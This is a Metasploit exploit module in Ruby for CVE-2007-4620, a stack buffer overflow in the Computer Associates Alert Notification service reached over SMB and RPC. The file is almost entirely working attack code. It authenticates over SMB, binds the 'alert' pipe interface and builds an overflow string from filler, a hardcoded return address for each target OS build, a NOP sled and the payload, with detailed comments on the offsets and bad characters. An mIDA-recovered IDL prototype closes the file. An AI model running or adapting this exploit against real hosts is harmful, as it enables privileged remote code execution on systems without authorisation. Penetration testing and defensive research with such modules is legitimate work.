GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/brightstor/etrust_itm_alert.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
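class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Exploit for CVE-2007-4620: a stack buffer overflow in the CA Alert
  # Notification service reached over the 'alert' named pipe (RPC interface
  # 3d742890-397c-11cf-9bf1-00805f88cb72, version 1.0, opnum 0x00).
  #
  # The module authenticates over SMB (valid credentials are required), binds
  # to the interface and sends a request whose second string argument is
  # oversized. That string is laid out as:
  #
  #   [Offset bytes of filler][Ret, 32-bit LE][12 NOPs][payload][772 bytes pad]
  #
  # Per-target 'Offset' is the number of bytes before the saved return
  # address is overwritten; 'Ret' is the value written there (presumably a
  # trampoline inside a system DLL of that exact OS build -- not verified
  # here, which is why each target is pinned to one service pack/language).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Computer Associates Alert Notification Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1
          By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
          In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-4620' ],
          [ 'OSVDB', '44040' ],
          [ 'BID', '28605' ],
        ],
        # The service runs with elevated rights, so a session inherits them.
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 550,
          # Bytes the overflowed string argument cannot carry. \x00, \x0a and
          # \x0d are string/line terminators; the path-like characters
          # (\x5c \x5f \x2f \x2e) are excluded as well. The same set is applied
          # to every random byte this module generates, not only the payload,
          # because filler, padding and payload share one RPC string.
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          # Moves ESP away from the smashed frame before the decoder runs.
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows 2003 SP0 English', { 'Offset' => 979, 'Ret' => 0x77e03efb } ],
          [ 'Windows 2000 SP4 English', { 'Offset' => 979, 'Ret' => 0x7c30d043 } ],
          [ 'CA BrightStor ARCServe Backup 11.5 / Windows 2000 SP4 English', { 'Offset' => 207, 'Ret' => 0x7c2e7993 } ], # Yin Dehui
        ],
        'DisclosureDate' => '2008-04-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use (alert)", 'alert']),
      ]
    )
  end

  # Connects and authenticates over SMB, binds the alert RPC interface on the
  # configured named pipe and sends the overflow request.
  #
  # The service typically stops answering once its stack has been smashed, so
  # a NoResponse from the call is the expected outcome and is not treated as
  # a failure; the payload handler then waits for the session.
  def exploit
    connect
    smb_login

    handle = dcerpc_handle(
      '3d742890-397c-11cf-9bf1-00805f88cb72', '1.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    print_status("Trying target #{target.name}...")

    begin
      dcerpc_call(0x00, build_request)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # Expected: the overflowed service does not reply. Surface it only in
      # verbose mode so the operator can still tell this path was taken.
      vprint_status('No response from the RPC call (expected after overflow)')
    end

    handler
    disconnect
  end

  private

  # Builds the NDR stub for opnum 0x00: three NUL-terminated strings followed
  # by a long. The second string is the one that overflows; the first and
  # third are random printable junk of random (1..1024) length.
  #
  # All random text is generated with the module's declared payload bad
  # characters excluded. The original filler/padding used the unrestricted
  # printable set, which includes \x5c, \x5f, \x2f and \x2e -- bytes the
  # module itself says cannot survive in this argument.
  #
  # Returns the encoded stub as a String.
  def build_request
    bad = payload_badchars

    overflow = rand_text_english(target['Offset'], bad) # reach the saved return address
    overflow << [target.ret].pack('V')                   # overwrite it, little-endian
    overflow << make_nops(12)                            # short sled before the payload
    overflow << payload.encoded
    overflow << rand_text_english(772, bad)              # trailing padding

    # Each argument gets an explicit NUL in addition to whatever NDR.string
    # adds; this mirrors the request layout the module has always sent.
    stub = NDR.string(rand_text_english(rand(1..1024), bad) + "\x00")
    stub << NDR.string(overflow + "\x00")
    stub << NDR.string(rand_text_english(rand(1..1024), bad) + "\x00")
    stub << NDR.long(0)
    stub
  end
end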
=begin
/*
 * IDL code generated by mIDA v1.0.8
 * Copyright (C) 2006, Tenable Network Security
 * http://cgi.tenablesecurity.com/tenable/mida.php
 *
 *
 * Decompilation information:
 * RPC stub type: inline
 */

[ uuid(3d742890-397c-11cf-9bf1-00805f88cb72), version(1.0) ]

interface mIDA_interface
{
  typedef struct struct_1 {
    long elem_1;
    [size_is(10000), length_is(elem_1)] struct struct_2 * elem_2;
  } struct_1 ;

  typedef struct struct_2 {
    char elem_1[52];
  } struct_2 ;


  /* opcode: 0x00, address: 0x00401000 */

  long sub_401000 (
    [in][ref][string] char * arg_1,
    [out][ref] struct struct_1 * arg_2,
    [in][ref][string] char * arg_3
  );

}

Note: opnum 0x00 above is the routine this module calls. The request the
module actually sends (three NDR strings followed by a long) does not map
one-to-one onto the two [in] string parameters shown here, so treat this
recovered prototype as approximate rather than authoritative.
=end